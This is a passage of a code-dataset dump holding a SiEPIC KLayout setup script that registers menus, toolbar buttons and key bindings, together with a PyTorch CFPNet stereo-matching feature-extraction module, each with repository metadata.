] | 1 | 2022-03-04T16:07:31.000Z | 2022-03-04T16:07:31.000Z | from .ak import Arknights # noqa: F401
from .cgi import AkCall # noqa: F401
from .exception import PostException # noqa: F401
| 32.25 | 50 | 0.744186 | from .ak import Arknights
from .cgi import AkCall
from .exception import PostException
| true | true |
f72351587dd352745ee8c22af559c72e61329e99 | 8,192 | py | Python | klayout_dot_config/python/SiEPIC/setup.py | SiEPIC-Kits/SiEPIC-Tools | 1f62c33021771a54507cf1d94bb3b2cc57419d8a | [
"MIT"
] | 1 | 2021-04-08T02:23:44.000Z | 2021-04-08T02:23:44.000Z | klayout_dot_config/python/SiEPIC/setup.py | SiEPIC-Kits/SiEPIC-Tools | 1f62c33021771a54507cf1d94bb3b2cc57419d8a | [
"MIT"
] | null | null | null | klayout_dot_config/python/SiEPIC/setup.py | SiEPIC-Kits/SiEPIC-Tools | 1f62c33021771a54507cf1d94bb3b2cc57419d8a | [
"MIT"
] | null | null | null | import pya
def registerMenuItems():
    """Install the SiEPIC menus and toolbar buttons into the KLayout UI.
    Idempotent: each menu/toolbar entry is inserted only if not already
    present (checked via menu.is_menu).
    """
    import os
    from . import scripts, lumerical, install
    import SiEPIC.__init__
    # NOTE(review): this appends to a module-level ACTIONS list that is not
    # initialized in the visible code — verify it is defined before this runs.
    global ACTIONS
    count = 0
    menu = pya.Application.instance().main_window().menu()
    # Icon files shipped in the "files" directory next to this module.
    path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                        "files", "INTERCONNECT_icon.png")
    path_flv = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                            "files", "flv_icon.png")
    path_test = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                             "files", "test_icon.png")
    import sys
    # Menu title suffix: " Py3" only for Python 3 on macOS, otherwise " Py2".
    if int(sys.version[0]) > 2 and sys.platform == 'darwin':
        extra = " Py3"
    else:
        extra = " Py2"
    s1 = "siepic_menu"
    if not(menu.is_menu(s1)):
        menu.insert_menu("help_menu", s1, "SiEPIC %s" % SiEPIC.__init__.__version__ + extra)
    # Sub-menus of the SiEPIC menu, inserted in display order.
    s2 = "waveguides"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Waveguides")
    s2 = "metal"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Metal")
    s2 = "layout"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Layout")
    s2 = "exlayout"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Example Layouts")
    s2 = "verification"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Verification")
    s2 = "simulation_circuits"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Simulation, Circuits")
    s2 = "simulation_components"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Simulation, Components")
    s2 = "measurements"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Measurement Data")
    # Toolbar buttons; each pya.Action is stored in ACTIONS (presumably to
    # keep the handler objects alive — confirm against KLayout's pya API).
    if not(menu.is_menu("@toolbar.cir_sim")):
        ACTIONS.append(pya.Action())
        menu.insert_item("@toolbar.end", "cir_sim", ACTIONS[count])
        ACTIONS[count].title = "Circuit \nSimulation"
        ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_toolbar)
        ACTIONS[count].icon = path
        count += 1
    if not(menu.is_menu("@toolbar.verification")):
        ACTIONS.append(pya.Action())
        menu.insert_item("@toolbar.end", "verification", ACTIONS[count])
        ACTIONS[count].title = "Functional\nVerification"
        ACTIONS[count].on_triggered(scripts.layout_check)
        ACTIONS[count].icon = path_flv
        count += 1
    if not(menu.is_menu("@toolbar.coordinates")):
        ACTIONS.append(pya.Action())
        menu.insert_item("@toolbar.end", "coordinates", ACTIONS[count])
        ACTIONS[count].title = "Testing\nCoordinates"
        ACTIONS[count].on_triggered(scripts.auto_coord_extract)
        ACTIONS[count].icon = path_test
        count += 1
    # Disabled (if 0) legacy INTERCONNECT sub-menu entries, kept for reference.
    if 0:
        if not(menu.is_menu("@toolbar.cir_sim.mc_sim")):
            ACTIONS.append(pya.Action())
            menu.insert_item("@toolbar.cir_sim.end", "mc_sim", ACTIONS[count])
            ACTIONS[count].title = "INTERCONNECT Monte Carlo Simulations"
            ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_monte_carlo)
            ACTIONS[count].icon = path
            count += 1
        if not(menu.is_menu("@toolbar.cir_sim.launch_lumerical")):
            ACTIONS.append(pya.Action())
            menu.insert_item("@toolbar.cir_sim.end", "launch_lumerical", ACTIONS[count])
            ACTIONS[count].title = "INTERCONNECT Circuit Simulation"
            ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation)
            ACTIONS[count].icon = path
            count += 1
        if not(menu.is_menu("@toolbar.cir_sim.update_netlist")):
            ACTIONS.append(pya.Action())
            menu.insert_item("@toolbar.cir_sim.end", "update_netlist", ACTIONS[count])
            ACTIONS[count].title = "INTERCONNECT Update Netlist"
            ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_update_netlist)
            ACTIONS[count].icon = path
def registerKeyBindings():
    """Apply SiEPIC-preferred key bindings and editor settings to KLayout.
    Reads the current 'key-bindings' config string, overlays the SiEPIC
    bindings, writes it back, and sets various editor options.  Prompts
    the user to restart if edit-mode had to be switched on.
    """
    import os
    config = pya.Application.instance().get_config('key-bindings')
    if config == '':
        print('WARNING: get_config(key-bindings) returned null')
        mapping = dict()
    else:
        # NOTE(review): assumes each ';'-separated item contains exactly one
        # ':' — a value containing ':' would break this split; confirm with
        # KLayout's key-bindings config format.
        mapping = dict(item.split(":") for item in config.split(";"))
    mapping['edit_menu.clear_all_rulers'] = "'Ctrl+K'"
    mapping['edit_menu.copy'] = "'Ctrl+C'"
    mapping['edit_menu.cut'] = "'Ctrl+X'"
    mapping['edit_menu.paste'] = "'Ctrl+V'"
    mapping['edit_menu.redo'] = "'Ctrl+Y'"
    mapping['edit_menu.undo'] = "'Ctrl+Z'"
    mapping['edit_menu.delete'] = "'Del'"
    # mapping['edit_menu.duplicate'] = "'Ctrl+B'"
    mapping['edit_menu.mode_menu.move'] = "'M'"
    mapping['edit_menu.mode_menu.ruler'] = "'R'"
    mapping['edit_menu.mode_menu.select'] = "'S'"
    mapping['edit_menu.mode_menu.box'] = "'B'"
    mapping['edit_menu.mode_menu.instance'] = "'I'"
    mapping['edit_menu.mode_menu.partial'] = "'L'"
    mapping['edit_menu.mode_menu.path'] = "'P'"
    mapping['edit_menu.mode_menu.polygon'] = "'G'"
    mapping['edit_menu.mode_menu.text'] = "'X'"
    mapping['edit_menu.select_menu.select_all'] = "'Shift+Ctrl+A'"
    mapping['edit_menu.show_properties'] = "'Q'"
    mapping['edit_menu.edit_options'] = "'E'"
    mapping['edit_menu.selection_menu.change_layer'] = "'Shift+L'"
    mapping['edit_menu.selection_menu.sel_flip_x'] = "'Shift+H'"
    mapping['edit_menu.selection_menu.sel_flip_y'] = "'Shift+V'"
    mapping['edit_menu.selection_menu.sel_move'] = "'Ctrl+M'"
    mapping['edit_menu.selection_menu.sel_rot_ccw'] = "'Shift+R'"
    mapping['edit_menu.selection_menu.sel_free_rot'] = "'Ctrl+Shift+R'"
    mapping['edit_menu.selection_menu.flatten_insts'] = "'Ctrl+Shift+F'"
    mapping['edit_menu.selection_menu.make_cell'] = "'Ctrl+Shift+M'"
    # mapping['edit_menu.selection_menu.size'] = "'Z'"
    # mapping['edit_menu.selection_menu.tap'] = "''"
    mapping['file_menu.new_layout'] = "'Ctrl+N'"
    mapping['file_menu.close'] = "'Ctrl+W'"
    mapping['file_menu.open_new_panel'] = "'Ctrl+O'"
    mapping['file_menu.open_same_panel'] = "'Ctrl+Shift+O'"
    mapping['file_menu.save'] = "'Ctrl+S'"
    mapping['file_menu.save_as'] = "'Ctrl+Shift+S'"
    mapping['file_menu.screenshot'] = "'F12'"
    # mapping['file_menu.setup'] = "'F4'"
    mapping['macros_menu.macro_development'] = "'F5'"
    mapping['zoom_menu.max_hier'] = "'Shift+F'"
    mapping['zoom_menu.select_current_cell'] = "'Shift+S'"  # Display > Show as new top
    mapping['zoom_menu.zoom_fit'] = "'F'"
    mapping['zoom_menu.zoom_fit_sel'] = "'Shift+F2'"
    mapping['zoom_menu.zoom_in'] = "'Return'"
    mapping['zoom_menu.zoom_out'] = "'Shift+Return'"
    # turn the hash back into a config string
    config = ''.join('{}:{};'.format(key, val) for key, val in sorted(mapping.items()))[:-1]
    pya.Application.instance().set_config('key-bindings', config)
    # Editor behaviour defaults preferred for SiEPIC layout work.
    pya.Application.instance().set_config('edit-connect-angle-mode', 'ortho')
    pya.Application.instance().set_config('edit-inst-angle', '0')
    pya.Application.instance().set_config('edit-move-angle-mode', 'diagonal')
    pya.Application.instance().set_config('edit-snap-to-objects', 'true')
    pya.Application.instance().set_config('grid-micron', '0.01')
    pya.Application.instance().set_config('edit-top-level-selection', 'true')
    pya.Application.instance().set_config('inst-color', '#ffcdcd')
    pya.Application.instance().set_config('text-font', '3')
    pya.Application.instance().set_config('guiding-shape-line-width', '0')
    pya.Application.instance().set_config('rdb-marker-color', '#ff0000')
    pya.Application.instance().set_config('rdb-marker-line-width', '8')
    # pya.Application.instance().set_config('default-layer-properties', os.path.join(os.path.realpath(__file__), os.pardir, os.pardir, os.pardir, 'libraries', 'klayout_Layers_EBeam.lyp'))
    # Force edit mode on; KLayout requires a restart for this to take effect.
    if pya.Application.instance().get_config('edit-mode') == 'false':
        pya.Application.instance().set_config('edit-mode', 'true')
        pya.MessageBox.warning(
            "Restart", "Please restart KLayout. SiEPIC settings have been applied.", pya.MessageBox.Ok)
| 43.115789 | 186 | 0.644775 | import pya
def registerMenuItems():
    """Install the SiEPIC menus and toolbar buttons into the KLayout UI.
    Idempotent: each menu/toolbar entry is inserted only if not already
    present (checked via menu.is_menu).
    """
    import os
    from . import scripts, lumerical, install
    import SiEPIC.__init__
    # NOTE(review): this appends to a module-level ACTIONS list that is not
    # initialized in the visible code — verify it is defined before this runs.
    global ACTIONS
    count = 0
    menu = pya.Application.instance().main_window().menu()
    # Icon files shipped in the "files" directory next to this module.
    path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                        "files", "INTERCONNECT_icon.png")
    path_flv = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                            "files", "flv_icon.png")
    path_test = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                             "files", "test_icon.png")
    import sys
    # Menu title suffix: " Py3" only for Python 3 on macOS, otherwise " Py2".
    if int(sys.version[0]) > 2 and sys.platform == 'darwin':
        extra = " Py3"
    else:
        extra = " Py2"
    s1 = "siepic_menu"
    if not(menu.is_menu(s1)):
        menu.insert_menu("help_menu", s1, "SiEPIC %s" % SiEPIC.__init__.__version__ + extra)
    # Sub-menus of the SiEPIC menu, inserted in display order.
    s2 = "waveguides"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Waveguides")
    s2 = "metal"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Metal")
    s2 = "layout"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Layout")
    s2 = "exlayout"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Example Layouts")
    s2 = "verification"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Verification")
    s2 = "simulation_circuits"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Simulation, Circuits")
    s2 = "simulation_components"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Simulation, Components")
    s2 = "measurements"
    if not(menu.is_menu(s1 + "." + s2)):
        menu.insert_menu(s1 + ".end", s2, "Measurement Data")
    # Toolbar buttons; each pya.Action is stored in ACTIONS (presumably to
    # keep the handler objects alive — confirm against KLayout's pya API).
    if not(menu.is_menu("@toolbar.cir_sim")):
        ACTIONS.append(pya.Action())
        menu.insert_item("@toolbar.end", "cir_sim", ACTIONS[count])
        ACTIONS[count].title = "Circuit \nSimulation"
        ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_toolbar)
        ACTIONS[count].icon = path
        count += 1
    if not(menu.is_menu("@toolbar.verification")):
        ACTIONS.append(pya.Action())
        menu.insert_item("@toolbar.end", "verification", ACTIONS[count])
        ACTIONS[count].title = "Functional\nVerification"
        ACTIONS[count].on_triggered(scripts.layout_check)
        ACTIONS[count].icon = path_flv
        count += 1
    if not(menu.is_menu("@toolbar.coordinates")):
        ACTIONS.append(pya.Action())
        menu.insert_item("@toolbar.end", "coordinates", ACTIONS[count])
        ACTIONS[count].title = "Testing\nCoordinates"
        ACTIONS[count].on_triggered(scripts.auto_coord_extract)
        ACTIONS[count].icon = path_test
        count += 1
    # Disabled (if 0) legacy INTERCONNECT sub-menu entries, kept for reference.
    if 0:
        if not(menu.is_menu("@toolbar.cir_sim.mc_sim")):
            ACTIONS.append(pya.Action())
            menu.insert_item("@toolbar.cir_sim.end", "mc_sim", ACTIONS[count])
            ACTIONS[count].title = "INTERCONNECT Monte Carlo Simulations"
            ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_monte_carlo)
            ACTIONS[count].icon = path
            count += 1
        if not(menu.is_menu("@toolbar.cir_sim.launch_lumerical")):
            ACTIONS.append(pya.Action())
            menu.insert_item("@toolbar.cir_sim.end", "launch_lumerical", ACTIONS[count])
            ACTIONS[count].title = "INTERCONNECT Circuit Simulation"
            ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation)
            ACTIONS[count].icon = path
            count += 1
        if not(menu.is_menu("@toolbar.cir_sim.update_netlist")):
            ACTIONS.append(pya.Action())
            menu.insert_item("@toolbar.cir_sim.end", "update_netlist", ACTIONS[count])
            ACTIONS[count].title = "INTERCONNECT Update Netlist"
            ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_update_netlist)
            ACTIONS[count].icon = path
def registerKeyBindings():
import os
config = pya.Application.instance().get_config('key-bindings')
if config == '':
print('WARNING: get_config(key-bindings) returned null')
mapping = dict()
else:
mapping = dict(item.split(":") for item in config.split(";"))
mapping['edit_menu.clear_all_rulers'] = "'Ctrl+K'"
mapping['edit_menu.copy'] = "'Ctrl+C'"
mapping['edit_menu.cut'] = "'Ctrl+X'"
mapping['edit_menu.paste'] = "'Ctrl+V'"
mapping['edit_menu.redo'] = "'Ctrl+Y'"
mapping['edit_menu.undo'] = "'Ctrl+Z'"
mapping['edit_menu.delete'] = "'Del'"
mapping['edit_menu.mode_menu.move'] = "'M'"
mapping['edit_menu.mode_menu.ruler'] = "'R'"
mapping['edit_menu.mode_menu.select'] = "'S'"
mapping['edit_menu.mode_menu.box'] = "'B'"
mapping['edit_menu.mode_menu.instance'] = "'I'"
mapping['edit_menu.mode_menu.partial'] = "'L'"
mapping['edit_menu.mode_menu.path'] = "'P'"
mapping['edit_menu.mode_menu.polygon'] = "'G'"
mapping['edit_menu.mode_menu.text'] = "'X'"
mapping['edit_menu.select_menu.select_all'] = "'Shift+Ctrl+A'"
mapping['edit_menu.show_properties'] = "'Q'"
mapping['edit_menu.edit_options'] = "'E'"
mapping['edit_menu.selection_menu.change_layer'] = "'Shift+L'"
mapping['edit_menu.selection_menu.sel_flip_x'] = "'Shift+H'"
mapping['edit_menu.selection_menu.sel_flip_y'] = "'Shift+V'"
mapping['edit_menu.selection_menu.sel_move'] = "'Ctrl+M'"
mapping['edit_menu.selection_menu.sel_rot_ccw'] = "'Shift+R'"
mapping['edit_menu.selection_menu.sel_free_rot'] = "'Ctrl+Shift+R'"
mapping['edit_menu.selection_menu.flatten_insts'] = "'Ctrl+Shift+F'"
mapping['edit_menu.selection_menu.make_cell'] = "'Ctrl+Shift+M'"
mapping['file_menu.new_layout'] = "'Ctrl+N'"
mapping['file_menu.close'] = "'Ctrl+W'"
mapping['file_menu.open_new_panel'] = "'Ctrl+O'"
mapping['file_menu.open_same_panel'] = "'Ctrl+Shift+O'"
mapping['file_menu.save'] = "'Ctrl+S'"
mapping['file_menu.save_as'] = "'Ctrl+Shift+S'"
mapping['file_menu.screenshot'] = "'F12'"
mapping['macros_menu.macro_development'] = "'F5'"
mapping['zoom_menu.max_hier'] = "'Shift+F'"
mapping['zoom_menu.select_current_cell'] = "'Shift+S'"
mapping['zoom_menu.zoom_fit'] = "'F'"
mapping['zoom_menu.zoom_fit_sel'] = "'Shift+F2'"
mapping['zoom_menu.zoom_in'] = "'Return'"
mapping['zoom_menu.zoom_out'] = "'Shift+Return'"
config = ''.join('{}:{};'.format(key, val) for key, val in sorted(mapping.items()))[:-1]
pya.Application.instance().set_config('key-bindings', config)
pya.Application.instance().set_config('edit-connect-angle-mode', 'ortho')
pya.Application.instance().set_config('edit-inst-angle', '0')
pya.Application.instance().set_config('edit-move-angle-mode', 'diagonal')
pya.Application.instance().set_config('edit-snap-to-objects', 'true')
pya.Application.instance().set_config('grid-micron', '0.01')
pya.Application.instance().set_config('edit-top-level-selection', 'true')
pya.Application.instance().set_config('inst-color', '#ffcdcd')
pya.Application.instance().set_config('text-font', '3')
pya.Application.instance().set_config('guiding-shape-line-width', '0')
pya.Application.instance().set_config('rdb-marker-color', '#ff0000')
pya.Application.instance().set_config('rdb-marker-line-width', '8')
if pya.Application.instance().get_config('edit-mode') == 'false':
pya.Application.instance().set_config('edit-mode', 'true')
pya.MessageBox.warning(
"Restart", "Please restart KLayout. SiEPIC settings have been applied.", pya.MessageBox.Ok)
| true | true |
f72351ccd603f3f141ef47bf33cce0ab32b980df | 8,829 | py | Python | models/CFPNet/submodule.py | wangqingyu985/OpenStereo | 91d605357d65281b99b0d8cf45e3f15f0543c9fa | [
"MIT"
] | 3 | 2021-11-30T12:10:22.000Z | 2022-03-30T07:02:33.000Z | models/CFPNet/submodule.py | wangqingyu985/OpenStereo | 91d605357d65281b99b0d8cf45e3f15f0543c9fa | [
"MIT"
] | null | null | null | models/CFPNet/submodule.py | wangqingyu985/OpenStereo | 91d605357d65281b99b0d8cf45e3f15f0543c9fa | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
def convbn(in_planes, out_planes, kernel_size, stride, pad, dilation):
    """2-D convolution followed by batch norm (no bias, no activation).

    For dilated convolutions (dilation > 1) the dilation factor itself is
    used as the padding; otherwise ``pad`` is used.
    """
    effective_pad = dilation if dilation > 1 else pad
    conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size,
                     stride=stride, padding=effective_pad,
                     dilation=dilation, bias=False)
    return nn.Sequential(conv, nn.BatchNorm2d(out_planes))
def convbn_3d(in_planes, out_planes, kernel_size, stride, pad):
    """3-D convolution followed by batch norm (no bias, no activation)."""
    layers = [
        nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size,
                  padding=pad, stride=stride, bias=False),
        nn.BatchNorm3d(out_planes),
    ]
    return nn.Sequential(*layers)
class BasicBlock(nn.Module):
    """Residual block: two conv+BN stages with an identity (or projected) skip.

    Note: following the PSMNet design, there is no ReLU after the addition.
    """
    expansion = 1

    def __init__(self, inplanes, planes, kernel_size, stride, downsample, pad, dilation):
        super(BasicBlock, self).__init__()
        # First stage may change resolution (stride) and is ReLU-activated.
        self.conv1 = nn.Sequential(
            convbn(inplanes, planes, kernel_size, stride, pad, dilation),
            nn.ReLU(inplace=True),
        )
        # Second stage keeps resolution and has no activation.
        self.conv2 = convbn(planes, planes, kernel_size, 1, pad, dilation)
        self.stride = stride
        self.downsample = downsample

    def forward(self, x):
        # Project the skip path only when a downsample module was supplied.
        residual = x if self.downsample is None else self.downsample(x)
        out = self.conv2(self.conv1(x))
        return out + residual
class matchshifted(nn.Module):
    """Build one cost-volume slice by shifting left/right features.

    Keeps columns ``[shift, width)`` of the left map and ``[0, width-shift)``
    of the right map, left-pads both back to the original width, then
    concatenates them channel-wise into a 5-D volume.
    """

    def __init__(self):
        super(matchshifted, self).__init__()

    def forward(self, left, right, shift):
        batch, filters, height, width = left.size()
        # Column indices to keep on each side (moved to the GPU, matching
        # the original implementation's .cuda() placement).
        keep_left = Variable(torch.LongTensor(list(range(shift, width)))).cuda()
        keep_right = Variable(torch.LongTensor(list(range(width - shift)))).cuda()
        shifted_left = F.pad(torch.index_select(left, 3, keep_left), (shift, 0, 0, 0))
        shifted_right = F.pad(torch.index_select(right, 3, keep_right), (shift, 0, 0, 0))
        stacked = torch.cat((shifted_left, shifted_right), 1)
        # (N, 2C, 1, H, W): one disparity-plane slice of the cost volume.
        return stacked.view(batch, filters * 2, 1, height, width)
class disparityregression(nn.Module):
    """Soft-argmin disparity regression.

    Given a per-pixel probability volume over ``maxdisp`` candidate
    disparities, returns the probability-weighted expected disparity.
    """

    def __init__(self, maxdisp):
        super(disparityregression, self).__init__()
        # Constant (1, maxdisp, 1, 1) tensor holding candidates 0..maxdisp-1,
        # kept on the GPU as in the original implementation.
        candidates = np.reshape(np.array(range(maxdisp)), [1, maxdisp, 1, 1])
        self.disp = Variable(torch.Tensor(candidates).cuda(), requires_grad=False)

    def forward(self, x):
        # Broadcast the candidate disparities over batch and spatial dims,
        # then reduce over the disparity axis.
        disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])
        return torch.sum(x * disp, 1)
class feature_extraction(nn.Module):
    """CFPNet feature extractor.

    A three-stage strided residual trunk followed by parallel dilated-conv
    and average-pool (SPP-style) context branches; everything is fused and
    compressed into a 32-channel feature map at 1/4 of the input
    resolution: (N, 3, H, W) -> (N, 32, H/4, W/4).
    """
    def __init__(self):
        super(feature_extraction, self).__init__()
        self.inplanes = 32
        # Stem: 3 -> 32 channels at full resolution.
        self.layer0 = nn.Sequential(convbn(in_planes=3, out_planes=32, kernel_size=3, stride=1, pad=1, dilation=1),
                                    nn.ReLU(inplace=True)
                                    )
        # Residual stages; the first block of each downsamples by 2
        # (H -> H/2 -> H/4 -> H/8).
        self.layer1 = self._make_layer(block=BasicBlock, planes=32, blocks=3, kernel_size=3, stride=2, pad=1, dilation=1, order=1)
        self.layer2 = self._make_layer(BasicBlock, 64, 8, 3, 2, 1, 1, 1)
        self.layer3 = self._make_layer(BasicBlock, 128, 3, 3, 2, 1, 1, 2)
        # Plain stride-2 conv shortcuts run in parallel with the stages;
        # forward() sums each with the corresponding stage output.
        self.layer1_after = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
                                          nn.ReLU(inplace=True))
        self.layer2_after = nn.Sequential(convbn(32, 64, 3, 2, 1, 1),
                                          nn.ReLU(inplace=True))
        self.layer3_after = nn.Sequential(convbn(64, 128, 3, 2, 1, 1),
                                          nn.ReLU(inplace=True))
        # Brings the stage-1 features (H/2) down to the H/4 grid so they can
        # be concatenated with the other fused maps in forward().
        self.layer1_final = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
                                          nn.ReLU(inplace=True))
        # Dilated-convolution context branches, 128 -> 32 channels each,
        # with decreasing dilation rates (32, 16, 8, 6).
        self.dilat1 = nn.Sequential(convbn(128, 32, 3, 1, 1, 32),
                                    nn.ReLU(inplace=True),
                                    convbn(32, 32, 3, 1, 1, 1),
                                    nn.ReLU(inplace=True))
        self.dilat2 = nn.Sequential(convbn(128, 32, 3, 1, 1, 16),
                                    nn.ReLU(inplace=True),
                                    convbn(32, 32, 3, 1, 1, 1),
                                    nn.ReLU(inplace=True))
        self.dilat3 = nn.Sequential(convbn(128, 32, 3, 1, 1, 8),
                                    nn.ReLU(inplace=True),
                                    convbn(32, 32, 3, 1, 1, 4),
                                    nn.ReLU(inplace=True))
        self.dilat4 = nn.Sequential(convbn(128, 32, 3, 1, 1, 6),
                                    nn.ReLU(inplace=True),
                                    convbn(32, 32, 3, 1, 1, 1),
                                    nn.ReLU(inplace=True))
        # SPP-style average-pooling branches with decreasing windows
        # (64, 32, 16, 8); each reduces 128 -> 32 channels via a 1x1 conv.
        self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
                                     convbn(128, 32, 1, 1, 0, 1),
                                     nn.ReLU(inplace=True))
        self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
                                     convbn(128, 32, 1, 1, 0, 1),
                                     nn.ReLU(inplace=True))
        self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
                                     convbn(128, 32, 1, 1, 0, 1),
                                     nn.ReLU(inplace=True))
        self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
                                     convbn(128, 32, 1, 1, 0, 1),
                                     nn.ReLU(inplace=True))
        # Fuses one dilated branch with one pooled branch (64 -> 32 ch).
        # NOTE(review): this single module is reused for all four
        # dilation/pool pairs, so its weights are shared across the pairs —
        # confirm the sharing is intentional.
        self.concat_dilate_pool = nn.Sequential(convbn(64, 32, 3, 1, 1, 1),
                                                nn.ReLU(inplace=True),
                                                nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1, bias=False))
        # Final fusion: 32 + 64 + 128 + 4*32 = 352 channels -> 32.
        self.lastconv = nn.Sequential(convbn(352, 128, 3, 1, 1, 1),
                                      nn.ReLU(inplace=True),
                                      nn.Conv2d(128, 32, kernel_size=1, padding=0, stride=1, bias=False))
    def _make_layer(self, block, planes, blocks, kernel_size, stride, pad, dilation, order):
        """Stack ``blocks`` residual blocks; only the first may downsample.

        ``order`` scales the input-channel count (self.inplanes * order).
        NOTE(review): self.inplanes is never updated after construction, so
        the channel bookkeeping relies on callers passing matching
        planes/order values — verify when adding stages.
        """
        downsample = None
        if stride != 1:
            # 1x1 projection so the skip connection matches the new
            # resolution and channel count.
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes * order, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),)
        layers = []
        layers.append(block(self.inplanes*order, planes, kernel_size, stride, downsample, pad, dilation))
        if blocks != 1:
            for i in range(1, blocks):
                layers.append(block(planes, planes, kernel_size, 1, None, pad, dilation))
        return nn.Sequential(*layers)
    def forward(self, x):
        """Return the fused (N, 32, H/4, W/4) feature map for input x."""
        out_0 = self.layer0(x)
        # Each residual stage output is summed with its plain-conv shortcut.
        out_1 = self.layer1(out_0)
        out_1_a = self.layer1_after(out_0)
        out_1 = out_1 + out_1_a
        out_2 = self.layer2(out_1)
        out_2_a = self.layer2_after(out_1)
        out_2 = out_2 + out_2_a
        out_3 = self.layer3(out_2)
        out_3_a = self.layer3_after(out_2)
        out_3 = out_3 + out_3_a
        out_1 = self.layer1_final(out_1)
        # Up-sample the deepest features (H/8) to the H/4 grid shared by all
        # context branches.  (F.upsample is deprecated in newer torch in
        # favour of F.interpolate; kept as-is here.)
        inPooling = F.upsample(out_3, (out_2.size()[2], out_2.size()[3]), mode='bilinear')
        # Dilated-convolution context branches.
        output_dilate1 = self.dilat1(inPooling)
        output_dilate2 = self.dilat2(inPooling)
        output_dilate3 = self.dilat3(inPooling)
        output_dilate4 = self.dilat4(inPooling)
        # Average-pooling branches, up-sampled back to the H/4 grid.
        output_branch1 = self.branch1(inPooling)
        output_branch1 = F.upsample(output_branch1, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
        output_branch2 = self.branch2(inPooling)
        output_branch2 = F.upsample(output_branch2, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
        output_branch3 = self.branch3(inPooling)
        output_branch3 = F.upsample(output_branch3, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
        output_branch4 = self.branch4(inPooling)
        output_branch4 = F.upsample(output_branch4, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
        # Pair-wise fusion of each dilated branch with its pooled branch
        # (weights of concat_dilate_pool are shared across the four pairs).
        out_fusion1 = torch.cat((output_dilate1, output_branch1), 1)
        out_fusion1 = self.concat_dilate_pool(out_fusion1)
        out_fusion2 = torch.cat((output_dilate2, output_branch2), 1)
        out_fusion2 = self.concat_dilate_pool(out_fusion2)
        out_fusion3 = torch.cat((output_dilate3, output_branch3), 1)
        out_fusion3 = self.concat_dilate_pool(out_fusion3)
        out_fusion4 = torch.cat((output_dilate4, output_branch4), 1)
        out_fusion4 = self.concat_dilate_pool(out_fusion4)
        # Concatenate trunk and context features (352 ch) and compress to 32.
        output_feature = torch.cat((out_1, out_2, inPooling, out_fusion1, out_fusion2, out_fusion3, out_fusion4), 1)
        output_feature = self.lastconv(output_feature)
        return output_feature
| 45.746114 | 172 | 0.557368 | from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
def convbn(in_planes, out_planes, kernel_size, stride, pad, dilation):
return nn.Sequential(nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=dilation if dilation > 1 else pad, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes)
)
def convbn_3d(in_planes, out_planes, kernel_size, stride, pad):
return nn.Sequential(nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, padding=pad, stride=stride, bias=False),
nn.BatchNorm3d(out_planes)
)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, kernel_size, stride, downsample, pad, dilation):
super(BasicBlock, self).__init__()
self.conv1 = nn.Sequential(convbn(inplanes, planes, kernel_size, stride, pad, dilation),
nn.ReLU(inplace=True)
)
